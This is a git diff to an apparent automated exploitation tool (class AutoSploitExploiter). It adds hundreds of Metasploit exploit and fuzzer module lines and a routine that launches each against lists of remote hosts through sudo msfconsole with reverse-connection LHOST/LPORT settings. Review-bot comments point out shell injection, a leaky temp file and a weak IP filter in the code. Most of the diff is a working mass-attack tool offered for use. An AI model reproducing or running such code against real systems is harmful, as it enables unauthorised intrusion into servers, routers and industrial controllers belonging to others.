- "use exploit/unix/webapp/citrix_access_gateway_exec;exploit -j;",
- "use exploit/unix/webapp/dogfood_spell_exec;exploit -j;",
- "use exploit/unix/webapp/invision_pboard_unserialize_exec;exploit -j;",
- "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j;",
- "use exploit/unix/webapp/mybb_backdoor;exploit -j;",
- "use exploit/unix/webapp/opensis_modname_exec;exploit -j;",
- "use exploit/unix/webapp/oscommerce_filemanager;exploit -j;",
- "use exploit/unix/webapp/piwik_superuser_plugin_upload;exploit -j;",
- "use exploit/unix/webapp/tikiwiki_upload_exec;exploit -j;",
- "use exploit/unix/webapp/webtester_exec;exploit -j;",
- "use exploit/unix/webapp/wp_phpmailer_host_header;exploit -j;",
- "use exploit/unix/webapp/wp_total_cache_exec;exploit -j;",
- "use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j;",
- "use exploit/windows/http/ektron_xslt_exec;exploit -j;",
- "use exploit/windows/http/ektron_xslt_exec_ws;exploit -j;",
- "use exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit -j;",
- "use exploit/windows/http/hp_autopass_license_traversal;exploit -j;",
- "use exploit/windows/http/manage_engine_opmanager_rce;exploit -j;",
- "use exploit/windows/http/netgear_nms_rce;exploit -j;",
- "use exploit/windows/http/sepm_auth_bypass_rce;exploit -j;",
- "use exploit/windows/http/trendmicro_officescan_widget_exec;exploit -j;",
- "use exploit/windows/iis/iis_webdav_upload_asp;exploit -j;",
- "use exploit/windows/iis/msadc;exploit -j;",
- "use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j;",
- "use exploit/windows/novell/file_reporter_fsfui_upload;exploit -j;",
- "use exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit -j;",
- "use exploit/windows/smb/ipass_pipe_exec;exploit -j;",
- "use exploit/windows/smb/smb_relay;exploit -j;",
- "use auxiliary/sqli/oracle/jvm_os_code_10g;exploit -j;",
- "use auxiliary/sqli/oracle/jvm_os_code_11g;exploit -j;",
- "use auxiliary/fuzzers/dns/dns_fuzzer;exploit -j;",
- "use auxiliary/fuzzers/ftp/client_ftp;exploit -j;",
- "use auxiliary/fuzzers/ftp/ftp_pre_post;exploit -j;",
- "use auxiliary/fuzzers/http/http_form_field;exploit -j;",
- "use auxiliary/fuzzers/http/http_get_uri_long;exploit -j;",
- "use auxiliary/fuzzers/http/http_get_uri_strings;exploit -j;",
- "use auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit -j;",
- "use auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit -j;",
- "use auxiliary/fuzzers/smb/smb_create_pipe;exploit -j;",
- "use auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit -j;",
- "use auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit -j; ",
- "use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit -j;",
- "use auxiliary/fuzzers/smb/smb_tree_connect;exploit -j;",
- "use auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit -j;",
- "use auxiliary/fuzzers/smtp/smtp_fuzzer;exploit -j;",
- "use auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit -j;",
- "use auxiliary/fuzzers/ssh/ssh_version_15;exploit -j;",
- "use auxiliary/fuzzers/ssh/ssh_version_2;exploit -j;",
- "use auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit -j;",
- "use auxiliary/fuzzers/tds/tds_login_corrupt;exploit -j;",
- "use auxiliary/fuzzers/tds/tds_login_username;exploit -j;"
+ "exploit/windows/firewall/blackice_pam_icq; exploit",
+ "exploit/windows/ftp/ms09_053_ftpd_nlst;exploit",
+ "exploit/windows/http/amlibweb_webquerydll_app;exploit",
+ "exploit/windows/http/ektron_xslt_exec_ws;exploit",
+ "exploit/windows/http/umbraco_upload_aspx;exploit",
+ "exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit",
+ "exploit/windows/iis/iis_webdav_upload_asp;exploit",
+ "exploit/windows/iis/ms01_023_printer;exploit",
+ "exploit/windows/iis/ms01_026_dbldecode;exploit",
+ "exploit/windows/iis/ms01_033_idq;exploit",
+ "exploit/windows/iis/ms02_018_htr;exploit",
+ "exploit/windows/iis/ms02_065_msadc;exploit",
+ "exploit/windows/iis/ms03_007_ntdll_webdav;exploit",
+ "exploit/windows/iis/msadc;exploit",
+ "exploit/windows/isapi/ms00_094_pbserver;exploit",
+ "exploit/windows/isapi/ms03_022_nsiislog_post;exploit",
+ "exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit",
+ "exploit/windows/isapi/rsa_webagent_redirect;exploit",
+ "exploit/windows/isapi/w3who_query;exploit",
+ "exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit",
+ "exploit/windows/ssl/ms04_011_pct;exploit",
+ "exploit/freebsd/http/watchguard_cmd_exec;exploit ",
+ "exploit/linux/http/alienvault_exec;exploit ",
+ "exploit/linux/http/alienvault_sqli_exec;exploit ",
+ "exploit/linux/http/astium_sqli_upload;exploit ",
+ "exploit/linux/http/centreon_sqli_exec;exploit ",
+ "exploit/linux/http/centreon_useralias_exec;exploit ",
+ "exploit/linux/http/crypttech_cryptolog_login_exec;exploit ",
+ "exploit/linux/http/dolibarr_cmd_exec;exploit ",
+ "exploit/linux/http/goautodial_3_rce_command_injection;exploit",
+ "exploit/linux/http/kloxo_sqli;exploit ",
+ "exploit/linux/http/nagios_xi_chained_rce;exploit ",
+ "exploit/linux/http/netgear_wnr2000_rce;exploit ",
+ "exploit/linux/http/pandora_fms_sqli;exploit ",
+ "exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit ",
+ "exploit/linux/http/wd_mycloud_multiupload_upload;exploit ",
+ "exploit/linux/http/zabbix_sqli;exploit ",
+ "exploit/linux/misc/qnap_transcode_server;exploit ",
+ "exploit/linux/mysql/mysql_yassl_getname;exploit ",
+ "exploit/linux/mysql/mysql_yassl_hello;exploit ",
+ "exploit/linux/postgres/postgres_payload;exploit ",
+ "exploit/linux/samba/is_known_pipename;exploit ",
+ "exploit/multi/browser/java_jre17_driver_manager;exploit ",
+ "exploit/multi/http/atutor_sqli;exploit ",
+ "exploit/multi/http/dexter_casinoloader_exec;exploit ",
+ "exploit/multi/http/drupal_drupageddon;exploit ",
+ "exploit/multi/http/manage_engine_dc_pmp_sqli;exploit ",
+ "exploit/multi/http/manageengine_search_sqli;exploit ",
+ "exploit/multi/http/movabletype_upgrade_exec;exploit ",
+ "exploit/multi/http/php_volunteer_upload_exe;exploit ",
+ "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit ",
+ "exploit/multi/http/splunk_mappy_exec;exploit ",
+ "exploit/multi/http/testlink_upload_exec;exploit ",
+ "exploit/multi/http/zpanel_information_disclosure_rce;exploit ",
+ "exploit/multi/misc/legend_bot_exec;exploit ",
+ "exploit/multi/mysql/mysql_udf_payload;exploit ",
+ "exploit/multi/postgres/postgres_createlang;exploit ",
+ "exploit/solaris/sunrpc/ypupdated_exec;exploit ",
+ "exploit/unix/ftp/proftpd_133c_backdoor;exploit ",
+ "exploit/unix/http/tnftp_savefile;exploit ",
+ "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit ",
+ "exploit/unix/webapp/kimai_sqli;exploit ",
+ "exploit/unix/webapp/openemr_sqli_privesc_upload;exploit ",
+ "exploit/unix/webapp/seportal_sqli_exec;exploit ",
+ "exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit ",
+ "exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit",
+ "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit ",
+ "exploit/windows/http/apache_mod_rewrite_ldap;exploit ",
+
"exploit/windows/http/ca_totaldefense_regeneratereports;exploit", + "exploit/windows/http/cyclope_ess_sqli;exploit", + "exploit/windows/http/hp_mpa_job_acct;exploit", + "exploit/windows/http/solarwinds_storage_manager_sql;exploit", + "exploit/windows/http/sonicwall_scrutinizer_sql;exploit", + "exploit/windows/misc/altiris_ds_sqli;exploit ", + "exploit/windows/misc/fb_cnct_group;exploit ", + "exploit/windows/misc/lianja_db_net;exploit ", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit ", + "exploit/windows/mssql/lyris_listmanager_weak_pass;exploit ", + "exploit/windows/mssql/ms02_039_slammer;exploit ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit ", + "exploit/windows/mssql/mssql_linkcrawler;exploit ", + "exploit/windows/mssql/mssql_payload;exploit ", + "exploit/windows/mssql/mssql_payload_sqli;exploit ", + "exploit/windows/mysql/mysql_mof;exploit ", + "exploit/windows/mysql/mysql_start_up;exploit ", + "exploit/windows/mysql/mysql_yassl_hello;exploit", + "exploit/windows/mysql/scrutinizer_upload_exec;exploit ", + "exploit/windows/postgres/postgres_payload;exploit ", + "exploit/windows/scada/realwin_on_fcs_login;exploit", + "exploit/multi/http/rails_actionpack_inline_exec;exploit", + "exploit/multi/http/rails_dynamic_render_code_exec;exploit", + "exploit/multi/http/rails_json_yaml_code_exec;exploit", + "exploit/multi/http/rails_secret_deserialization;exploit", + "exploit/multi/http/rails_web_console_v2_code_exec;exploit", + "exploit/multi/http/rails_xml_yaml_code_exec;exploit", + "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", + "exploit/multi/http/phpmoadmin_exec;exploit", + "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", + "exploit/multi/http/phpmyadmin_preg_replace;exploit", + "exploit/multi/http/phpscheduleit_start_date;exploit", + "exploit/multi/http/phptax_exec;exploit", + "exploit/multi/http/phpwiki_ploticus_exec;exploit", + 
"exploit/multi/http/plone_popen2;exploit", + "exploit/multi/http/pmwiki_pagelist;exploit", + "exploit/multi/http/joomla_http_header_rce;exploit", + "exploit/multi/http/novell_servicedesk_rce;exploit", + "exploit/multi/http/oracle_reports_rce;exploit", + "exploit/multi/http/php_utility_belt_rce;exploit", + "exploit/multi/http/phpfilemanager_rce;exploit", + "exploit/multi/http/processmaker_exec;exploit", + "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", + "exploit/multi/http/spree_search_exec;exploit", + "exploit/multi/http/spree_searchlogic_exec;exploit", + "exploit/multi/http/struts_code_exec_parameters;exploit", + "exploit/multi/http/vtiger_install_rce;exploit", + "exploit/multi/http/werkzeug_debug_rce;exploit", + "exploit/multi/http/zemra_panel_rce;exploit", + "exploit/multi/http/zpanel_information_disclosure_rce;exploit", + "exploit/multi/http/joomla_http_header_rce;exploit", + "exploit/unix/webapp/joomla_akeeba_unserialize;exploit", + "exploit/unix/webapp/joomla_comjce_imgmanager;exploit", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", + "exploit/unix/webapp/joomla_media_upload_exec;exploit", + "exploit/multi/http/builderengine_upload_exec;exploit", + "exploit/multi/http/caidao_php_backdoor_exec;exploit", + "exploit/multi/http/atutor_sqli;exploit ", + "exploit/multi/http/ajaxplorer_checkinstall_exec;exploit", + "exploit/multi/http/apache_activemq_upload_jsp;exploit -", + "exploit/unix/webapp/wp_lastpost_exec;exploit -", + "exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit", + "exploit/multi/http/axis2_deployer;exploit", + "exploit/unix/webapp/wp_foxypress_upload;exploit", + "exploit/linux/http/tr064_ntpserver_cmdinject;exploit", + "exploit/linux/misc/quest_pmmasterd_bof;exploit", + "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit", + "exploit/unix/webapp/php_xmlrpc_eval;exploit", + "exploit/unix/webapp/wp_admin_shell_upload;exploit", + "exploit/linux/http/sophos_wpa_sblistpack_exec;exploit", 
+ "exploit/linux/local/sophos_wpa_clear_keys;exploit", + "exploit/multi/http/zpanel_information_disclosure_rce;exploit", + "auxiliary/admin/cisco/cisco_asa_extrabacon;exploit", + "auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit", + "auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit", + "exploit/bsdi/softcart/mercantec_softcart;exploit ", + "exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit", + "exploit/freebsd/samba/trans2open;exploit", + "exploit/linux/ftp/proftp_sreplace;exploit ", + "exploit/linux/http/dcos_marathon;exploit", + "exploit/linux/http/f5_icall_cmd;exploit", + "exploit/linux/http/fritzbox_echo_exec;exploit", + "exploit/linux/http/gitlist_exec;exploit", + "exploit/linux/http/goautodial_3_rce_command_injection;exploit", + "exploit/linux/http/ipfire_bashbug_exec;exploit", + "exploit/linux/http/ipfire_oinkcode_exec;exploit", + "exploit/linux/http/ipfire_proxy_exec;exploit", + "exploit/linux/http/kaltura_unserialize_rce;exploit", + "exploit/linux/http/lifesize_uvc_ping_rce;exploit", + "exploit/linux/http/nagios_xi_chained_rce;exploit", + "exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit", + "exploit/linux/http/netgear_wnr2000_rce ;exploit", + "exploit/linux/http/nuuo_nvrmini_auth_rce;exploit", + "exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit", + "exploit/linux/http/op5_config_exec;exploit", + "exploit/linux/http/pandora_fms_exec;exploit", + "exploit/linux/http/pineapple_preconfig_cmdinject;exploit", + "exploit/linux/http/seagate_nas_php_exec_noauth;exploit", + "exploit/linux/http/symantec_messaging_gateway_exec;exploit", + "exploit/linux/http/trendmicro_imsva_widget_exec;exploit", + "exploit/linux/http/trueonline_billion_5200w_rce;exploit", + "exploit/linux/http/trueonline_p660hn_v1_rce;exploit", + "exploit/linux/http/trueonline_p660hn_v2_rce;exploit", + "exploit/linux/http/vcms_upload;exploit", + "exploit/linux/misc/lprng_format_string;exploit", + "exploit/linux/misc/mongod_native_helper;exploit", + 
"exploit/linux/misc/ueb9_bpserverd;exploit", + "exploit/linux/mysql/mysql_yassl_getname;exploit", + "exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit", + "exploit/linux/postgres/postgres_payload;exploit", + "exploit/linux/pptp/poptop_negative_read;exploit", + "exploit/linux/proxy/squid_ntlm_authenticate;exploit", + "exploit/linux/samba/lsa_transnames_heap;exploit", + "exploit/linux/samba/setinfopolicy_heap;exploit", + "exploit/linux/samba/trans2open;exploit", + "exploit/multi/elasticsearch/script_mvel_rce;exploit", + "exploit/multi/elasticsearch/search_groovy_script;exploit", + "exploit/multi/http/atutor_sqli;exploit", + "exploit/multi/http/axis2_deployer;exploit", + "exploit/multi/http/familycms_less_exe;exploit", + "exploit/multi/http/freenas_exec_raw;exploit", + "exploit/multi/http/gestioip_exec;exploit", + "exploit/multi/http/glassfish_deployer;exploit", + "exploit/multi/http/glpi_install_rce;exploit", + "exploit/multi/http/joomla_http_header_rce;exploit ", + "exploit/multi/http/makoserver_cmd_exec;exploit", + "exploit/multi/http/novell_servicedesk_rc;exploit", + "exploit/multi/http/oracle_reports_rce;exploit", + "exploit/multi/http/php_utility_belt_rce;exploit", + "exploit/multi/http/phpfilemanager_rce;exploit", + "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", + "exploit/multi/http/phpwiki_ploticus_exec;exploit", + "exploit/multi/http/processmaker_exec;exploit", + "exploit/multi/http/rails_actionpack_inline_exec;exploit", + "exploit/multi/http/rails_dynamic_render_code_exec;exploit", + "exploit/multi/http/rails_secret_deserialization;exploit", + "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", + "exploit/multi/http/simple_backdoors_exec;exploit", + "exploit/multi/http/spree_search_exec;exploit", + "exploit/multi/http/spree_searchlogic_exec;exploit", + "exploit/multi/http/struts2_rest_xstream;exploit", + "exploit/multi/http/struts_code_exec;exploit", + "exploit/multi/http/struts_code_exec_classloader;exploit", + 
"exploit/multi/http/struts_code_exec_parameters;exploit", + "exploit/multi/http/struts_dev_mode;exploit", + "exploit/multi/http/sysaid_auth_file_upload;exploit", + "exploit/multi/http/tomcat_jsp_upload_bypass;exploit", + "exploit/multi/http/vtiger_install_rce;exploit", + "exploit/multi/http/werkzeug_debug_rce;exploit", + "exploit/multi/http/zemra_panel_rce;exploit", + "exploit/multi/http/zpanel_information_disclosure_rce;exploit", + "exploit/multi/ids/snort_dce_rpc;exploit", + "exploit/multi/misc/batik_svg_java;exploit", + "exploit/multi/misc/pbot_exec;exploit", + "exploit/multi/misc/veritas_netbackup_cmdexec;exploit", + "exploit/multi/mysql/mysql_udf_payload;exploit", + "exploit/multi/php/php_unserialize_zval_cookie;exploit", + "exploit/unix/http/freepbx_callmenum;exploit", + "exploit/unix/http/lifesize_room;exploit", + "exploit/unix/http/pfsense_clickjacking;exploit", + "exploit/unix/http/pfsense_group_member_exec;exploit", + "exploit/unix/http/tnftp_savefile;exploit", + "exploit/unix/misc/polycom_hdx_traceroute_exec;exploit", + "exploit/unix/webapp/awstats_migrate_exec;exploit", + "exploit/unix/webapp/carberp_backdoor_exec;exploit", + "exploit/unix/webapp/citrix_access_gateway_exec;exploit", + "exploit/unix/webapp/dogfood_spell_exec;exploit", + "exploit/unix/webapp/invision_pboard_unserialize_exec;exploit", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", + "exploit/unix/webapp/mybb_backdoor;exploit", + "exploit/unix/webapp/opensis_modname_exec;exploit", + "exploit/unix/webapp/oscommerce_filemanager;exploit", + "exploit/unix/webapp/piwik_superuser_plugin_upload;exploit", + "exploit/unix/webapp/tikiwiki_upload_exec;exploit", + "exploit/unix/webapp/webtester_exec;exploit", + "exploit/unix/webapp/wp_phpmailer_host_header;exploit", + "exploit/unix/webapp/wp_total_cache_exec;exploit", + "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit", + "exploit/windows/http/ektron_xslt_exec;exploit", + 
"exploit/windows/http/ektron_xslt_exec_ws;exploit", + "exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit", + "exploit/windows/http/hp_autopass_license_traversal;exploit", + "exploit/windows/http/manage_engine_opmanager_rce;exploit", + "exploit/windows/http/netgear_nms_rce;exploit", + "exploit/windows/http/sepm_auth_bypass_rce;exploit", + "exploit/windows/http/trendmicro_officescan_widget_exec;exploit", + "exploit/windows/iis/iis_webdav_upload_asp;exploit", + "exploit/windows/iis/msadc;exploit", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit", + "exploit/windows/novell/file_reporter_fsfui_upload;exploit", + "exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit", + "exploit/windows/smb/ipass_pipe_exec;exploit", + "exploit/windows/smb/smb_relay;exploit", + "auxiliary/sqli/oracle/jvm_os_code_10g;exploit", + "auxiliary/sqli/oracle/jvm_os_code_11g;exploit", + "auxiliary/fuzzers/dns/dns_fuzzer;exploit", + "auxiliary/fuzzers/ftp/client_ftp;exploit", + "auxiliary/fuzzers/ftp/ftp_pre_post;exploit", + "auxiliary/fuzzers/http/http_form_field;exploit", + "auxiliary/fuzzers/http/http_get_uri_long;exploit", + "auxiliary/fuzzers/http/http_get_uri_strings;exploit", + "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit", + "auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit", + "auxiliary/fuzzers/smb/smb_create_pipe;exploit", + "auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit", + "auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit ", + "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit", + "auxiliary/fuzzers/smb/smb_tree_connect;exploit", + "auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit", + "auxiliary/fuzzers/smtp/smtp_fuzzer;exploit", + "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit", + "auxiliary/fuzzers/ssh/ssh_version_15;exploit", + "auxiliary/fuzzers/ssh/ssh_version_2;exploit", + "auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit", + "auxiliary/fuzzers/tds/tds_login_corrupt;exploit", + 
"auxiliary/fuzzers/tds/tds_login_username;exploit" ] } diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index f244945..2ab836f 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -25,6 +25,10 @@ def optparser(): help="provide a text file to convert into JSON and save for later use") parser.add_argument("-E", "--exploit", metavar="EXPLOIT", dest="singleExploit", help="pass a single exploit in the same format as the JSON file(s)") + parser.add_argument("--ruby-exec", action="store_true", dest="rubyExecutableNeeded", + help="if you need to run the Ruby executable with MSF use this") + parser.add_argument("--msf-path", metavar="MSF-PATH", dest="pathToFramework", + help="pass the path to your framework if it is not in your ENV PATH") parser.add_argument("--ethics", action="store_true", dest="displayEthics", help=argparse.SUPPRESS) # easter egg! opts = parser.parse_args() diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index e69de29..a461aae 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py 
@@ -0,0 +1,42 @@
+import lib.settings
+import lib.output
+
+
+class AutoSploitExploiter(object):
+
+ sorted_modules = []
+
+ def __init__(self, hosts, configuration, all_modules, **kwargs):
+ self.hosts = hosts
+ self.configuration = configuration
+ self.mods = all_modules
+ self.query = kwargs.get("query", lib.settings.QUERY_FILE_PATH)
+ self.query_file = open(self.query).read()
+ self.single = kwargs.get("single", None)
+ self.ruby_exec = kwargs.get("ruby_exec", False)
+ self.msf_path = kwargs.get("msf_path", None)
+
+ def view_sorted(self):
+ for mod in self.sorted_modules[0]:
+ print(mod)
+
+ def sort_modules_by_query(self):
+ for mod in self.mods:
+ if self.query_file.strip() in mod:
+ self.sorted_modules.append(mod)
+ return self.sorted_modules
+
+ def start_exploit(self, mods, hosts):
+ template = (
+ "sudo {} {} -x 'workspace -a {}; "
+ "setg LHOST {}; setg LPORT {}; setg VERBOSE "
+ "true; setg THREADS 100; set RHOSTS {}; use {} -j;'"
+ )
+ for mod, host in zip(mods, hosts):
+ template = template.format(
+ "ruby" if self.ruby_exec else "",
+ self.msf_path if self.msf_path is not None else "msfconsole",
+ self.configuration[0], self.configuration[1], self.configuration[2],
+ host.strip(), mod.strip()
+ )
+ lib.settings.cmdline(template)
diff --git a/lib/settings.py b/lib/settings.py
index 39f960d..487fc9b 100644
--- a/lib/settings.py
+++ b/lib/settings.py
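Review bot: `start_exploit` formats `host`, `mod`, `self.msf_path` and the three configuration values into a `sudo ... -x '...'` string with no quoting or validation, and `lib.settings.cmdline` (added in the lib/settings.py hunk of this commit) passes that string to `os.system`. A quote or shell metacharacter in any of those values — presumably they come from the gathered hosts file and from options such as `--msf-path` — is then interpreted by the shell on the operator's own machine. Reject entries that are not a strict dotted-quad address before formatting (the existing `validate_ip_addr` relies on `socket.inet_aton`, which is lenient about what it accepts), and have `cmdline` run an argument vector instead of a shell string, for example `return subprocess.call(shlex.split(command))` with `import shlex` added. The constructor also leaves the query file open; `with open(self.query) as handle: self.query_file = handle.read()` closes it.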
@@ -1,16 +1,22 @@ import os +import sys +import time import socket import getpass +import tempfile +import subprocess import psutil import lib.output -import api_calls +import lib.banner HOST_FILE = "{}/hosts.txt".format(os.getcwd()) +USAGE_AND_LEGAL_PATH = "{}/etc/text_files/general".format(os.getcwd()) START_POSTGRESQL_PATH = "{}/etc/scripts/start_postgre.sh".format(os.getcwd()) START_APACHE_PATH = "{}/etc/scripts/start_apache.sh".format(os.getcwd()) +QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name PLATFORM_PROMPT = "\n{}@\033[36mPLATFORM\033[0m$ ".format(getpass.getuser()) AUTOSPLOIT_PROMPT = "\n\033[31m{}\033[0m@\033[36mautosploit\033[0m# ".format(getpass.getuser()) API_KEYS = { @@ -31,15 +37,21 @@ 99: "quit" } +stop_animation = False + def validate_ip_addr(provided): """ validate an IP address to see if it is real or not """ - try: - socket.inet_aton(provided) - return True - except: + not_acceptable = ("0.0.0.0", "127.0.0.1", "255.255.255.255") + if provided not in not_acceptable: + try: + socket.inet_aton(provided) + return True + except: + return False + else: return False 
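Review bot: `QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name` creates a new temporary file every time `lib.settings` is imported, drops the file object without closing it, and nothing visible in this commit removes the file afterwards. Create the file when a query is actually written, or at least register cleanup next to the assignment, e.g. `atexit.register(os.remove, QUERY_FILE_PATH)` with `import atexit`. The added `USAGE_AND_LEGAL_PATH` follows the existing `os.getcwd()` pattern, so it resolves only when the program is started from the repository root; a path derived from `__file__` would not depend on the working directory.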
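Review bot: The new deny-list in `validate_ip_addr` compares the raw string, but `socket.inet_aton` accepts other spellings of the same addresses, so `127.1` or `0` still return `True`, as does the rest of `127.0.0.0/8`. Check the parsed bytes instead of the text: call `socket.inet_aton(provided)` first and test the packed result against the loopback, unspecified and broadcast values. The bare `except:` kept from the old code should become `except (socket.error, TypeError):` so unrelated errors are not reported as an invalid address.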
@@ -109,4 +121,61 @@ def makedir(dir): "censys": (open(API_KEYS["censys"][0]).read(), open(API_KEYS["censys"][1]).read()), "shodan": (open(API_KEYS["shodan"][0]).read(), ) } - return api_tokens \ No newline at end of file + return api_tokens + + +def cmdline(command): + """ + Function that allows us to store system command output in a variable. + We'll change this later in order to solve the potential security + risk that arises when passing untrusted input to the shell. + + I intend to have the issue resolved by Version 1.5.0. + """ + + os.system(command) + '''process = subprocess.call( + args=" ".join(command), + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + shell=True + ) + return process''' + + +def check_for_msf(): + in_env = os.getenv("msfconsole", False) + if not in_env: + return False + + +def logo(): + """ + display a random banner from the banner.py file + """ + print(lib.banner.banner_main()) + + +def animation(text): + """ + display an animation while working, this will be + single threaded so that it will not screw with the + current running process + """ + # TODO:/ this will not stop when stop animation is True + global stop_animation + i = 0 + while not stop_animation: + if stop_animation is True: + print("\n") + temp_text = list(text) + if i >= len(temp_text): + i = 0 + temp_text[i] = temp_text[i].upper() + temp_text = ''.join(temp_text) + sys.stdout.write("\033[96m\033[1m{}...\r\033[0m".format(temp_text)) + sys.stdout.flush() + i += 1 + time.sleep(0.1) + else: + print("\n") \ No newline at end of file
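Review bot: `check_for_msf` can only return `False` or `None`: when the lookup succeeds the function falls off the end, so a caller testing its result always sees a falsy value. It also reads an environment variable literally named `msfconsole` rather than searching `PATH`, which looks unintended given the `--msf-path` help text in lib/cmdline/cmd.py — confirm; if the variable check is what is wanted, `return bool(os.getenv("msfconsole"))` states it directly. Separately, the `cmdline` docstring says the command output is stored in a variable, but the function calls `os.system(command)` and returns nothing, and the disabled `subprocess.call` block would pass `" ".join(command)` on a string (which puts a space between every character) with `shell=True`. The docstring should describe what the function does now: run the string through the shell and discard the result.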